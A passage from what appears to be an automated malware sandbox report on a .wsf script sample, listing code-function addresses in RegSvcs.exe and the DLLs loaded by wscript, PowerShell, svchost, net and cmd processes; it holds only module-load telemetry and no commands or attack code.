              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_072BA608
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_0735E609
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_0735F6F4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_0735ACF8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_07351318
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_073579A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_0735C0C8
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_0735DB00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_0735130B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_07373C20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_07374930
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_073C7120
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 22_2_073C41E8
              Source: Summaryform_FXnbLLyKOJ.wsf | Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe  Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wininet.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: winhttp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: mswsock.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: winnsi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bitsproxy.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kdscli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ntasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: edputil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: policymanager.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wintypes.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appresolver.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: slc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sppc.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: qmgr.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: bitsperf.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: powrprof.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: firewallapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: esent.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: umpdc.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dnsapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: fwbase.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ntmarta.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: flightsettings.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: policymanager.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: netprofm.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: npmproxy.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: bitsigd.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: upnp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ssdpapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: appxdeploymentclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wsmauto.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: miutils.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wsmsvc.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dsrole.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: pcwum.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: mi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: winhttp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: wkscli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: msv1_0.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ntlmshared.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: cryptdll.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: webio.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: mswsock.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: winnsi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: rasadhlp.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: fwpuclnt.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: rmclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: coremessaging.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: twinapi.appcore.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: execmodelproxy.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: resourcepolicyclient.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: vssapi.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: vsstrace.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: samcli.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: samlib.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: es.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: bitsproxy.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc6.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: dhcpcsvc.dll
              Source: C:\Windows\System32\svchost.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\net.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\net.exe  Section loaded: wkscli.dll
              Source: C:\Windows\System32\net.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\net.exe  Section loaded: samcli.dll
              Source: C:\Windows\System32\net.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\net.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: samcli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: dsrole.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: wkscli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: logoncli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: taskschd.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: xmllite.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\net.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\net.exe  Section loaded: wkscli.dll
              Source: C:\Windows\System32\net.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\net.exe  Section loaded: samcli.dll
              Source: C:\Windows\System32\net.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\net.exe  Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: samcli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: dsrole.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: wkscli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: logoncli.dll
              Source: C:\Windows\System32\net1.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\cmd.exe  Section loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: vbscript.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe  Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\net.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\net.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\net1.exeSection loaded: samcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\net1.exeSection loaded: dsrole.dll
              Source: C:\Windows\System32\net1.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: logoncli.dll
              Source: C:\Windows\System32\net1.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
